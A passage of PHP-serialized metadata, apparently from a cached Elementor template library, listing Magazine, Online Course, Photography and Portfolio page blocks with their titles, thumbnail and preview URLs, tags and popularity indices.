Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Footer_s.png\";s:12:\"tmpl_created\";i:1579060715;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:28:\"[\"Blog\",\"Footer\",\"Magazine\"]\";s:10:\"menu_order\";i:448;s:16:\"popularity_index\";i:442;s:11:\"trend_index\";i:349;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:649;a:21:{s:4:\"tmpl\";i:945;s:2:\"id\";i:12678;s:5:\"title\";s:23:\"Magazine &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-magazine.png\";s:12:\"tmpl_created\";i:1579060701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:28:\"[\"Blog\",\"Header\",\"Magazine\"]\";s:10:\"menu_order\";i:450;s:16:\"popularity_index\";i:295;s:11:\"trend_index\";i:197;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:650;a:21:{s:4:\"tmpl\";i:947;s:2:\"id\";i:12661;s:5:\"title\";s:23:\"Magazine &#8211; Search\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Search_s.png\";s:12:\"tmpl_created\";i:1579060722;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-search/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:452;s:16:\"popularity_index\";i:396;s:11:\"trend_index\";i:509;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:651;a:21:{s:4:\"tmpl\";i:944;s:2:\"id\";i:12688;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 1\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post2_s.png\";s:12:\"tmpl_created\";i:1579060692;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:453;s:16:\"popularity_index\";i:342;s:11:\"trend_index\";i:175;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:652;a:21:{s:4:\"tmpl\";i:943;s:2:\"id\";i:12699;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 2\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post3_s.png\";s:12:\"tmpl_created\";i:1579060680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:454;s:16:\"popularity_index\";i:348;s:11:\"trend_index\";i:129;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:653;a:21:{s:4:\"tmpl\";i:942;s:2:\"id\";i:12707;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post1_s.png\";s:12:\"tmpl_created\";i:1579060669;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/magazine-single-post-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:457;s:16:\"popularity_index\";i:476;s:11:\"trend_index\";i:246;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:654;a:21:{s:4:\"tmpl\";i:941;s:2:\"id\";i:12716;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 3\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post4_s.png\";s:12:\"tmpl_created\";i:1579060659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/magazine-single-post-3-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:459;s:16:\"popularity_index\";i:513;s:11:\"trend_index\";i:489;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:655;a:21:{s:4:\"tmpl\";i:948;s:2:\"id\";i:12652;s:5:\"title\";s:17:\"Magazine- Archiv2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv2_s.png\";s:12:\"tmpl_created\";i:1579060730;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/magazine-archiv2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:461;s:16:\"popularity_index\";i:525;s:11:\"trend_index\";i:585;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:656;a:21:{s:4:\"tmpl\";i:990;s:2:\"id\";i:13361;s:5:\"title\";s:25:\"Online Course &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.jpg\";s:12:\"tmpl_created\";i:1587474710;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/online-course-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:35:\"[\"404\",\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:462;s:16:\"popularity_index\";i:682;s:11:\"trend_index\";i:498;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:657;a:21:{s:4:\"tmpl\";i:987;s:2:\"id\";i:13387;s:5:\"title\";s:32:\"Online Course &#8211; End Lesson\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Lesson-End-.jpg\";s:12:\"tmpl_created\";i:1587474682;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/online-course-end-lesson/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:464;s:16:\"popularity_index\";i:653;s:11:\"trend_index\";i:408;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:658;a:21:{s:4:\"tmpl\";i:989;s:2:\"id\";i:13369;s:5:\"title\";s:28:\"Online Course &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.jpg\";s:12:\"tmpl_created\";i:1587474701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/online-course-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:38:\"[\"Course Online\",\"Education\",\"Footer\"]\";s:10:\"menu_order\";i:466;s:16:\"popularity_index\";i:389;s:11:\"trend_index\";i:308;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:659;a:21:{s:4:\"tmpl\";i:988;s:2:\"id\";i:13378;s:5:\"title\";s:28:\"Online Course &#8211; Header\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-education-online-courses.jpg\";s:12:\"tmpl_created\";i:1587474693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/online-course-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:38:\"[\"Course Online\",\"Education\",\"Header\"]\";s:10:\"menu_order\";i:469;s:16:\"popularity_index\";i:492;s:11:\"trend_index\";i:519;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:660;a:21:{s:4:\"tmpl\";i:986;s:2:\"id\";i:13395;s:5:\"title\";s:34:\"Online Course &#8211; Start Lesson\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/04/Lesson-Start.jpg\";s:12:\"tmpl_created\";i:1587474673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/online-course-start-lesson/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:471;s:16:\"popularity_index\";i:672;s:11:\"trend_index\";i:578;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:661;a:21:{s:4:\"tmpl\";i:953;s:2:\"id\";i:13089;s:5:\"title\";s:23:\"Photography &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/02/404_s.png\";s:12:\"tmpl_created\";i:1582091623;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/photography-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:33:\"[\"404\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:473;s:16:\"popularity_index\";i:702;s:11:\"trend_index\";i:706;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:662;a:21:{s:4:\"tmpl\";i:954;s:2:\"id\";i:13096;s:5:\"title\";s:32:\"Photography &#8211; Archiv Media\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/02/Archiv_s.png\";s:12:\"tmpl_created\";i:1582091742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/blocks/photography-archiv-media/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:475;s:16:\"popularity_index\";i:631;s:11:\"trend_index\";i:405;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:663;a:21:{s:4:\"tmpl\";i:955;s:2:\"id\";i:13103;s:5:\"title\";s:26:\"Photography &#8211; Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/02/Footer_s.png\";s:12:\"tmpl_created\";i:1582091903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/photography-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:36:\"[\"Footer\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:477;s:16:\"popularity_index\";i:422;s:11:\"trend_index\";i:230;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:664;a:21:{s:4:\"tmpl\";i:957;s:2:\"id\";i:13112;s:5:\"title\";s:26:\"Photography &#8211; Header\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-photography-portfolio.png\";s:12:\"tmpl_created\";i:1582092483;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/photography-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:36:\"[\"Header\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:478;s:16:\"popularity_index\";i:325;s:11:\"trend_index\";i:205;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:665;a:21:{s:4:\"tmpl\";i:956;s:2:\"id\";i:13120;s:5:\"title\";s:31:\"Photography &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/02/Post_s.png\";s:12:\"tmpl_created\";i:1582092351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/photography-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:480;s:16:\"popularity_index\";i:671;s:11:\"trend_index\";i:645;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:666;a:21:{s:4:\"tmpl\";i:901;s:2:\"id\";i:11807;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/09/404_small.png\";s:12:\"tmpl_created\";i:1569430070;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:40:\"[\"404\",\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:483;s:16:\"popularity_index\";i:480;s:11:\"trend_index\";i:497;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:667;a:21:{s:4:\"tmpl\";i:900;s:2:\"id\";i:11832;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Footer_small.png\";s:12:\"tmpl_created\";i:1569430019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/portfolio-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:43:\"[\"Creative Portfolio\",\"Footer\",\"Portfolio\"]\";s:10:\"menu_order\";i:484;s:16:\"popularity_index\";i:246;s:11:\"trend_index\";i:102;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:668;a:21:{s:4:\"tmpl\";i:898;s:2:\"id\";i:11847;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Archiv_small.png\";s:12:\"tmpl_created\";i:1569430010;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:487;s:16:\"popularity_index\";i:336;s:11:\"trend_index\";i:455;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:669;a:21:{s:4:\"tmpl\";i:897;s:2:\"id\";i:11854;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/09/Post_small.png\";s:12:\"tmpl_created\";i:1569429983;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:489;s:16:\"popularity_index\";i:482;s:11:\"trend_index\";i:609;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:670;a:21:{s:4:\"tmpl\";i:904;s:2:\"id\";i:11890;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-design-portfolio.png\";s:12:\"tmpl_created\";i:1571907344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"Creative Portfolio\",\"Header\",\"Portfolio\"]\";s:10:\"menu_order\";i:491;s:16:\"popularity_index\";i:306;s:11:\"trend_index\";i:364;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:671;a:21:{s:4:\"tmpl\";i:896;s:2:\"id\";i:11861;s:5:\"title\";s:27:\"Portfolio &#8211; Project 1\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project1_small.png\";s:12:\"tmpl_created\";i:1569429975;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/portfolio-project-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:493;s:16:\"popularity_index\";i:643;s:11:\"trend_index\";i:764;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:672;a:21:{s:4:\"tmpl\";i:895;s:2:\"id\";i:11870;s:5:\"title\";s:27:\"Portfolio &#8211; Project 2\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project2_small.png\";s:12:\"tmpl_created\";i:1569429964;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/portfolio-project-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:495;s:16:\"popularity_index\";i:662;s:11:\"trend_index\";i:816;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:673;a:21:{s:4:\"tmpl\";i:903;s:2:\"id\";i:11897;s:5:\"title\";s:27:\"Portfolio &#8211; Project 2\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project2_small.png\";s:12:\"tmpl_created\";i:1569494236;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/portfolio-project-2-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:496;s:16:\"popularity_index\";i:733;s:11:\"trend_index\";i:744;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:674;a:21:{s:4:\"tmpl\";i:894;s:2:\"id\";i:11877;s:5:\"title\";s:27:\"Portfolio &#8211; Project 3\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/09/Project3_small.png\";s:12:\"tmpl_created\";i:1569429954;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/portfolio-project-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:34:\"[\"Creative Portfolio\",\"Portfolio\"]\";s:10:\"menu_order\";i:498;s:16:\"popularity_index\";i:692;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:675;a:21:{s:4:\"tmpl\";i:597;s:2:\"id\";i:5019;s:5:\"title\";s:11:\"Portfolio 